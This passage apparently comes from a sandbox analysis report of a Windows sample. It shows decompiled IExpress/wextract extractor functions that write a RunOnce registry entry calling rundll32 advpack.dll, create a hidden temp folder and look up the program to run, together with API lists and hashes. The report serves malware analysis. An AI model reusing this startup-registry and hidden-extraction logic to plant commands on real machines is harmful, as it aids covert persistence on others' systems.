                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 62482547-3460614246
                                                                      • Opcode ID: ab9790060bea6a536fc3f2cde415c496f5deabaa617f35f9cbf9a4fbc30e5c0f
                                                                      • Instruction ID: 5a5fdb4a499e0b79ee568c7714857821c973eb7d877512742ab611ba73bad100
                                                                      • Opcode Fuzzy Hash: ab9790060bea6a536fc3f2cde415c496f5deabaa617f35f9cbf9a4fbc30e5c0f
                                                                      • Instruction Fuzzy Hash: 3011E9712033056BE73CBAF9A888B673B699F442A4B040035FA30D3248DB75DC81C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D6F40() {
                                                                      
                                                                      				SetUnhandledExceptionFilter(E011D6EF0); // executed
                                                                      				return 0;
                                                                      			}



                                                                      0x011d6f45
                                                                      0x011d6f4d

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 011D6F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: a7acc0f12de9cbb110ae9bf7ce452908f71724cfffe726ac4234c88e0bb9ba10
                                                                      • Instruction ID: 835613f9326d6420dc11ae62b9e44cadb9789b001f9fad4f51d3c3fa02ac8a54
                                                                      • Opcode Fuzzy Hash: a7acc0f12de9cbb110ae9bf7ce452908f71724cfffe726ac4234c88e0bb9ba10
                                                                      • Instruction Fuzzy Hash: 1890026125311097DA289B71A91951579915E4D5427815474E021C5448DB6040809611
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 93%
                                                                      			E011D202A(struct HINSTANCE__* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v528;
                                                                      				void* _v532;
                                                                      				int _v536;
                                                                      				int _v540;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				long _t36;
                                                                      				long _t41;
                                                                      				struct HINSTANCE__* _t46;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t50;
                                                                      				CHAR* _t54;
                                                                      				void _t56;
                                                                      				signed int _t66;
                                                                      				intOrPtr* _t72;
                                                                      				void* _t73;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr* _t81;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t90;
                                                                      				_Unknown_base(*)()* _t91;
                                                                      				signed int _t93;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      
                                                                      				_t79 = __edx;
                                                                      				_t28 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t28 ^ _t93;
                                                                      				_t84 = 0x104;
                                                                      				memset( &_v268, 0, 0x104);
                                                                      				memset( &_v528, 0, 0x104);
                                                                      				_t95 = _t94 + 0x18;
                                                                      				_t66 = 0;
                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                      				if(_t36 != 0) {
                                                                      					L24:
                                                                      					return E011D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                      				}
                                                                      				_push(_t86);
                                                                      				_t87 = 0;
                                                                      				while(1) {
                                                                      					E011D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                      					_t95 = _t95 + 0x10;
                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                      					if(_t41 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t87 = _t87 + 1;
                                                                      					if(_t87 < 0xc8) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				if(_t87 != 0xc8) {
                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                      					_t79 = _t84;
                                                                      					E011D658A( &_v528, _t84, "advpack.dll");
                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                      					_t84 = _t46;
                                                                      					if(_t84 == 0) {
                                                                      						L10:
                                                                      						if(GetModuleFileNameA( *0x11d9a3c,  &_v268, 0x104) == 0) {
                                                                      							L17:
                                                                      							_t36 = RegCloseKey(_v532);
                                                                      							L23:
                                                                      							_pop(_t86);
                                                                      							goto L24;
                                                                      						}
                                                                      						L11:
                                                                      						_t72 =  &_v268;
                                                                      						_t80 = _t72 + 1;
                                                                      						do {
                                                                      							_t49 =  *_t72;
                                                                      							_t72 = _t72 + 1;
                                                                      						} while (_t49 != 0);
                                                                      						_t73 = _t72 - _t80;
                                                                      						_t81 = 0x11d91e4;
                                                                      						do {
                                                                      							_t50 =  *_t81;
                                                                      							_t81 = _t81 + 1;
                                                                      						} while (_t50 != 0);
                                                                      						_t84 = _t73 + 0x50 + _t81 - 0x11d91e5;
                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x11d91e5);
                                                                      						if(_t90 != 0) {
                                                                      							 *0x11d8580 = _t66 ^ 0x00000001;
                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                      							if(_t66 == 0) {
                                                                      								_t54 = "%s /D:%s";
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      							E011D171E(_t90, _t84, _t54,  &_v268);
                                                                      							_t75 = _t90;
                                                                      							_t23 = _t75 + 1; // 0x1
                                                                      							_t79 = _t23;
                                                                      							do {
                                                                      								_t56 =  *_t75;
                                                                      								_t75 = _t75 + 1;
                                                                      							} while (_t56 != 0);
                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                      							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                      							RegCloseKey(_v532); // executed
                                                                      							_t36 = LocalFree(_t90);
                                                                      							goto L23;
                                                                      						}
                                                                      						_t79 = 0x4b5;
                                                                      						E011D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                      					FreeLibrary(_t84); // executed
                                                                      					if(_t91 == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      						E011D658A( &_v268, 0x104, 0x11d1140);
                                                                      					}
                                                                      					goto L11;
                                                                      				}
                                                                      				_t36 = RegCloseKey(_v532);
                                                                      				 *0x11d8530 = _t66;
                                                                      				goto L23;
                                                                      			}

































                                                                      0x011d202a
                                                                      0x011d2035
                                                                      0x011d203c
                                                                      0x011d2041
                                                                      0x011d2050
                                                                      0x011d205f
                                                                      0x011d2064
                                                                      0x011d206f
                                                                      0x011d208c
                                                                      0x011d2094
                                                                      0x011d2257
                                                                      0x011d2266
                                                                      0x011d2266
                                                                      0x011d209a
                                                                      0x011d209b
                                                                      0x011d209d
                                                                      0x011d20aa
                                                                      0x011d20af
                                                                      0x011d20c9
                                                                      0x011d20d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d20d3
                                                                      0x011d20da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d20da
                                                                      0x011d20e2
                                                                      0x011d2103
                                                                      0x011d210e
                                                                      0x011d2116
                                                                      0x011d2122
                                                                      0x011d2128
                                                                      0x011d212c
                                                                      0x011d2179
                                                                      0x011d2194
                                                                      0x011d21de
                                                                      0x011d21e4
                                                                      0x011d2256
                                                                      0x011d2256
                                                                      0x00000000
                                                                      0x011d2256
                                                                      0x011d2196
                                                                      0x011d2196
                                                                      0x011d219c
                                                                      0x011d219f
                                                                      0x011d219f
                                                                      0x011d21a1
                                                                      0x011d21a2
                                                                      0x011d21a6
                                                                      0x011d21a8
                                                                      0x011d21b0
                                                                      0x011d21b0
                                                                      0x011d21b2
                                                                      0x011d21b3
                                                                      0x011d21bc
                                                                      0x011d21c7
                                                                      0x011d21cb
                                                                      0x011d21f1
                                                                      0x011d21f6
                                                                      0x011d21fd
                                                                      0x011d21ff
                                                                      0x011d21ff
                                                                      0x011d2204
                                                                      0x011d2213
                                                                      0x011d2218
                                                                      0x011d221d
                                                                      0x011d221d
                                                                      0x011d2220
                                                                      0x011d2220
                                                                      0x011d2222
                                                                      0x011d2223
                                                                      0x011d2229
                                                                      0x011d223d
                                                                      0x011d2249
                                                                      0x011d2250
                                                                      0x00000000
                                                                      0x011d2250
                                                                      0x011d21d2
                                                                      0x011d21d9
                                                                      0x00000000
                                                                      0x011d21d9
                                                                      0x011d213a
                                                                      0x011d2141
                                                                      0x011d2144
                                                                      0x011d214c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2163
                                                                      0x011d2172
                                                                      0x011d2172
                                                                      0x00000000
                                                                      0x011d2163
                                                                      0x011d20ea
                                                                      0x011d20f0
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D2050
                                                                      • memset.MSVCRT ref: 011D205F
                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 011D208C
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D20C9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D20EA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2103
                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2122
                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 011D2134
                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2144
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D215B
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D218C
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D21C1
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D21E4
                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 011D223D
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2249
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011D2250
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                      • API String ID: 178549006-3765599613
                                                                      • Opcode ID: 27d866dad5f3b5b20713bd1aecbdfea6fd396100647785d8e9b262997c9ea10b
                                                                      • Instruction ID: b6b390474fb73e3e46cc1433336d886a573da4fee7235f78d6cac5bc73203f77
                                                                      • Opcode Fuzzy Hash: 27d866dad5f3b5b20713bd1aecbdfea6fd396100647785d8e9b262997c9ea10b
                                                                      • Instruction Fuzzy Hash: A951D475A02214ABDB3D9B74EC48FEB7B7CEF44700F0042A8FA65E7145DB7199858B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 232 11d55a0-11d55d9 call 11d468f LocalAlloc 235 11d55fd-11d560c call 11d468f 232->235 236 11d55db-11d55f1 call 11d44b9 call 11d6285 232->236 241 11d560e-11d5630 call 11d44b9 LocalFree 235->241 242 11d5632-11d5643 lstrcmpA 235->242 248 11d55f6-11d55f8 236->248 241->248 245 11d564b-11d5659 LocalFree 242->245 246 11d5645 242->246 250 11d565b-11d565d 245->250 251 11d5696-11d569c 245->251 246->245 252 11d58b7-11d58c7 call 11d6ce0 248->252 255 11d565f-11d5667 250->255 256 11d5669 250->256 253 11d589f-11d58b5 call 11d6517 251->253 254 11d56a2-11d56a8 251->254 253->252 254->253 259 11d56ae-11d56c1 GetTempPathA 254->259 255->256 260 11d566b-11d567a call 11d5467 255->260 256->260 263 11d56f3-11d5711 call 11d1781 259->263 264 11d56c3-11d56c9 call 11d5467 259->264 269 11d589b-11d589d 260->269 270 11d5680-11d5691 call 11d44b9 260->270 274 11d586c-11d5890 GetWindowsDirectoryA call 11d597d 263->274 275 11d5717-11d5729 GetDriveTypeA 263->275 272 11d56ce-11d56d0 264->272 269->252 270->248 272->269 276 11d56d6-11d56df call 11d2630 272->276 274->263 288 11d5896 274->288 278 11d572b-11d572e 275->278 279 11d5730-11d5740 GetFileAttributesA 275->279 276->263 289 11d56e1-11d56ed call 11d5467 276->289 278->279 282 11d5742-11d5745 278->282 279->282 283 11d577e-11d578f call 11d597d 279->283 286 11d576b 282->286 287 11d5747-11d574f 282->287 295 11d5791-11d579e call 11d2630 283->295 296 11d57b2-11d57bf call 11d2630 283->296 292 11d5771-11d5779 286->292 287->292 293 11d5751-11d5753 287->293 288->269 289->263 289->269 298 11d5864-11d5866 292->298 293->292 297 11d5755-11d5762 call 11d6952 293->297 295->286 306 11d57a0-11d57b0 call 11d597d 295->306 307 11d57c1-11d57cd GetWindowsDirectoryA 296->307 308 11d57d3-11d57f8 call 11d658a GetFileAttributesA 296->308 297->286 309 11d5764-11d5769 297->309 298->274 298->275 306->286 306->296 307->308 314 11d580a 308->314 315 11d57fa-11d5808 CreateDirectoryA 308->315 309->283 309->286 316 11d580d-11d580f 314->316 315->316 317 11d5827-11d585c SetFileAttributesA call 11d1781 call 11d5467 316->317 318 11d5811-11d5825 316->318 317->269 323 11d585e 317->323 318->298 323->298
                                                                      C-Code - Quality: 92%
                                                                      			E011D55A0(void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v265;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				int _t32;
                                                                      				int _t33;
                                                                      				int _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t38;
                                                                      				int _t40;
                                                                      				int _t44;
                                                                      				long _t48;
                                                                      				int _t49;
                                                                      				int _t50;
                                                                      				signed int _t53;
                                                                      				int _t54;
                                                                      				int _t59;
                                                                      				char _t60;
                                                                      				int _t65;
                                                                      				char _t66;
                                                                      				int _t67;
                                                                      				int _t68;
                                                                      				int _t69;
                                                                      				int _t70;
                                                                      				int _t71;
                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                      				int _t73;
                                                                      				CHAR* _t82;
                                                                      				CHAR* _t88;
                                                                      				void* _t103;
                                                                      				signed int _t110;
                                                                      
                                                                      				_t28 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t28 ^ _t110;
                                                                      				_t2 = E011D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                      				if(_t109 != 0) {
                                                                      					_t82 = "RUNPROGRAM";
                                                                      					_t32 = E011D468F(_t82, _t109, 1);
                                                                      					__eflags = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                      						__eflags = _t33;
                                                                      						if(_t33 == 0) {
                                                                      							 *0x11d9a30 = 1;
                                                                      						}
                                                                      						LocalFree(_t109);
                                                                      						_t35 =  *0x11d8b3e; // 0x0
                                                                      						__eflags = _t35;
                                                                      						if(_t35 == 0) {
                                                                      							__eflags =  *0x11d8a24; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								L46:
                                                                      								_t101 = 0x7d2;
                                                                      								_t36 = E011D6517(_t82, 0x7d2, 0, E011D3210, 0, 0);
                                                                      								asm("sbb eax, eax");
                                                                      								_t38 =  ~( ~_t36);
                                                                      							} else {
                                                                      								__eflags =  *0x11d9a30; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t109 = 0x11d91e4;
                                                                      									_t40 = GetTempPathA(0x104, 0x11d91e4);
                                                                      									__eflags = _t40;
                                                                      									if(_t40 == 0) {
                                                                      										L19:
                                                                      										_push(_t82);
                                                                      										E011D1781( &_v268, 0x104, _t82, "A:\\");
                                                                      										__eflags = _v268 - 0x5a;
                                                                      										if(_v268 <= 0x5a) {
                                                                      											do {
                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                      												__eflags = _t109 - 6;
                                                                      												if(_t109 == 6) {
                                                                      													L22:
                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                      													__eflags = _t48 - 0xffffffff;
                                                                      													if(_t48 != 0xffffffff) {
                                                                      														goto L30;
                                                                      													} else {
                                                                      														goto L23;
                                                                      													}
                                                                      												} else {
                                                                      													__eflags = _t109 - 3;
                                                                      													if(_t109 != 3) {
                                                                      														L23:
                                                                      														__eflags = _t109 - 2;
                                                                      														if(_t109 != 2) {
                                                                      															L28:
                                                                      															_t66 = _v268;
                                                                      															goto L29;
                                                                      														} else {
                                                                      															_t66 = _v268;
                                                                      															__eflags = _t66 - 0x41;
                                                                      															if(_t66 == 0x41) {
                                                                      																L29:
                                                                      																_t60 = _t66 + 1;
                                                                      																_v268 = _t60;
                                                                      																goto L42;
                                                                      															} else {
                                                                      																__eflags = _t66 - 0x42;
                                                                      																if(_t66 == 0x42) {
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	_t68 = E011D6952( &_v268);
                                                                      																	__eflags = _t68;
                                                                      																	if(_t68 == 0) {
                                                                      																		goto L28;
                                                                      																	} else {
                                                                      																		__eflags = _t68 - 0x19000;
                                                                      																		if(_t68 >= 0x19000) {
                                                                      																			L30:
                                                                      																			_push(0);
                                                                      																			_t103 = 3;
                                                                      																			_t49 = E011D597D( &_v268, _t103, 1);
                                                                      																			__eflags = _t49;
                                                                      																			if(_t49 != 0) {
                                                                      																				L33:
                                                                      																				_t50 = E011D2630(0,  &_v268, 1);
                                                                      																				__eflags = _t50;
                                                                      																				if(_t50 != 0) {
                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                      																				}
                                                                      																				_t88 =  &_v268;
                                                                      																				E011D658A(_t88, 0x104, "msdownld.tmp");
                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                      																				if(_t53 != 0xffffffff) {
                                                                      																					_t54 = _t53 & 0x00000010;
                                                                      																					__eflags = _t54;
                                                                      																				} else {
                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                      																				}
                                                                      																				__eflags = _t54;
                                                                      																				if(_t54 != 0) {
                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                      																					_push(_t88);
                                                                      																					_t109 = 0x11d91e4;
                                                                      																					E011D1781(0x11d91e4, 0x104, _t88,  &_v268);
                                                                      																					_t101 = 1;
                                                                      																					_t59 = E011D5467(0x11d91e4, 1, 0);
                                                                      																					__eflags = _t59;
                                                                      																					if(_t59 != 0) {
                                                                      																						goto L45;
                                                                      																					} else {
                                                                      																						_t60 = _v268;
                                                                      																						goto L42;
                                                                      																					}
                                                                      																				} else {
                                                                      																					_t60 = _v268 + 1;
                                                                      																					_v265 = 0;
                                                                      																					_v268 = _t60;
                                                                      																					goto L42;
                                                                      																				}
                                                                      																			} else {
                                                                      																				_t65 = E011D2630(0,  &_v268, 1);
                                                                      																				__eflags = _t65;
                                                                      																				if(_t65 != 0) {
                                                                      																					goto L28;
                                                                      																				} else {
                                                                      																					_t67 = E011D597D( &_v268, 1, 1, 0);
                                                                      																					__eflags = _t67;
                                                                      																					if(_t67 == 0) {
                                                                      																						goto L28;
                                                                      																					} else {
                                                                      																						goto L33;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		} else {
                                                                      																			goto L28;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      												goto L47;
                                                                      												L42:
                                                                      												__eflags = _t60 - 0x5a;
                                                                      											} while (_t60 <= 0x5a);
                                                                      										}
                                                                      										goto L43;
                                                                      									} else {
                                                                      										_t101 = 1;
                                                                      										_t69 = E011D5467(0x11d91e4, 1, 3); // executed
                                                                      										__eflags = _t69;
                                                                      										if(_t69 != 0) {
                                                                      											goto L45;
                                                                      										} else {
                                                                      											_t82 = 0x11d91e4;
                                                                      											_t70 = E011D2630(0, 0x11d91e4, 1);
                                                                      											__eflags = _t70;
                                                                      											if(_t70 != 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												_t101 = 1;
                                                                      												_t82 = 0x11d91e4;
                                                                      												_t71 = E011D5467(0x11d91e4, 1, 1);
                                                                      												__eflags = _t71;
                                                                      												if(_t71 != 0) {
                                                                      													goto L45;
                                                                      												} else {
                                                                      													do {
                                                                      														goto L19;
                                                                      														L43:
                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                      														_push(4);
                                                                      														_t101 = 3;
                                                                      														_t82 =  &_v268;
                                                                      														_t44 = E011D597D(_t82, _t101, 1);
                                                                      														__eflags = _t44;
                                                                      													} while (_t44 != 0);
                                                                      													goto L2;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							__eflags = _t35 - 0x5c;
                                                                      							if(_t35 != 0x5c) {
                                                                      								L10:
                                                                      								_t72 = 1;
                                                                      							} else {
                                                                      								__eflags =  *0x11d8b3f - _t35; // 0x0
                                                                      								_t72 = 0;
                                                                      								if(__eflags != 0) {
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      							_t101 = 0;
                                                                      							_t73 = E011D5467(0x11d8b3e, 0, _t72);
                                                                      							__eflags = _t73;
                                                                      							if(_t73 != 0) {
                                                                      								L45:
                                                                      								_t38 = 1;
                                                                      							} else {
                                                                      								_t101 = 0x4be;
                                                                      								E011D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t101 = 0x4b1;
                                                                      						E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						LocalFree(_t109);
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					_t101 = 0x4b5;
                                                                      					E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				L47:
                                                                      				return E011D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                      			}





































                                                                      0x011d55ab
                                                                      0x011d55b2
                                                                      0x011d55c9
                                                                      0x011d55d5
                                                                      0x011d55d9
                                                                      0x011d5600
                                                                      0x011d5605
                                                                      0x011d560a
                                                                      0x011d560c
                                                                      0x011d5638
                                                                      0x011d5641
                                                                      0x011d5643
                                                                      0x011d5645
                                                                      0x011d5645
                                                                      0x011d564c
                                                                      0x011d5652
                                                                      0x011d5657
                                                                      0x011d5659
                                                                      0x011d5696
                                                                      0x011d569c
                                                                      0x011d589f
                                                                      0x011d58a7
                                                                      0x011d58ac
                                                                      0x011d58b3
                                                                      0x011d58b5
                                                                      0x011d56a2
                                                                      0x011d56a2
                                                                      0x011d56a8
                                                                      0x00000000
                                                                      0x011d56ae
                                                                      0x011d56ae
                                                                      0x011d56b9
                                                                      0x011d56bf
                                                                      0x011d56c1
                                                                      0x011d56f3
                                                                      0x011d56f3
                                                                      0x011d5705
                                                                      0x011d570a
                                                                      0x011d5711
                                                                      0x011d5717
                                                                      0x011d5724
                                                                      0x011d5726
                                                                      0x011d5729
                                                                      0x011d5730
                                                                      0x011d5737
                                                                      0x011d573d
                                                                      0x011d5740
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d572b
                                                                      0x011d572b
                                                                      0x011d572e
                                                                      0x011d5742
                                                                      0x011d5742
                                                                      0x011d5745
                                                                      0x011d576b
                                                                      0x011d576b
                                                                      0x00000000
                                                                      0x011d5747
                                                                      0x011d5747
                                                                      0x011d574d
                                                                      0x011d574f
                                                                      0x011d5771
                                                                      0x011d5771
                                                                      0x011d5773
                                                                      0x00000000
                                                                      0x011d5751
                                                                      0x011d5751
                                                                      0x011d5753
                                                                      0x00000000
                                                                      0x011d5755
                                                                      0x011d575b
                                                                      0x011d5760
                                                                      0x011d5762
                                                                      0x00000000
                                                                      0x011d5764
                                                                      0x011d5764
                                                                      0x011d5769
                                                                      0x011d577e
                                                                      0x011d577e
                                                                      0x011d5781
                                                                      0x011d5788
                                                                      0x011d578d
                                                                      0x011d578f
                                                                      0x011d57b2
                                                                      0x011d57b8
                                                                      0x011d57bd
                                                                      0x011d57bf
                                                                      0x011d57cd
                                                                      0x011d57cd
                                                                      0x011d57dd
                                                                      0x011d57e3
                                                                      0x011d57ef
                                                                      0x011d57f5
                                                                      0x011d57f8
                                                                      0x011d580a
                                                                      0x011d580a
                                                                      0x011d57fa
                                                                      0x011d5802
                                                                      0x011d5802
                                                                      0x011d580d
                                                                      0x011d580f
                                                                      0x011d5830
                                                                      0x011d5836
                                                                      0x011d583d
                                                                      0x011d584b
                                                                      0x011d5851
                                                                      0x011d5855
                                                                      0x011d585a
                                                                      0x011d585c
                                                                      0x00000000
                                                                      0x011d585e
                                                                      0x011d585e
                                                                      0x00000000
                                                                      0x011d585e
                                                                      0x011d5811
                                                                      0x011d5817
                                                                      0x011d5819
                                                                      0x011d581f
                                                                      0x00000000
                                                                      0x011d581f
                                                                      0x011d5791
                                                                      0x011d5797
                                                                      0x011d579c
                                                                      0x011d579e
                                                                      0x00000000
                                                                      0x011d57a0
                                                                      0x011d57a9
                                                                      0x011d57ae
                                                                      0x011d57b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d57b0
                                                                      0x011d579e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5769
                                                                      0x011d5762
                                                                      0x011d5753
                                                                      0x011d574f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d572e
                                                                      0x00000000
                                                                      0x011d5864
                                                                      0x011d5864
                                                                      0x011d5864
                                                                      0x011d5717
                                                                      0x00000000
                                                                      0x011d56c3
                                                                      0x011d56c5
                                                                      0x011d56c9
                                                                      0x011d56ce
                                                                      0x011d56d0
                                                                      0x00000000
                                                                      0x011d56d6
                                                                      0x011d56d6
                                                                      0x011d56d8
                                                                      0x011d56dd
                                                                      0x011d56df
                                                                      0x00000000
                                                                      0x011d56e1
                                                                      0x011d56e2
                                                                      0x011d56e4
                                                                      0x011d56e6
                                                                      0x011d56eb
                                                                      0x011d56ed
                                                                      0x00000000
                                                                      0x011d56f3
                                                                      0x011d56f3
                                                                      0x00000000
                                                                      0x011d586c
                                                                      0x011d5878
                                                                      0x011d587e
                                                                      0x011d5882
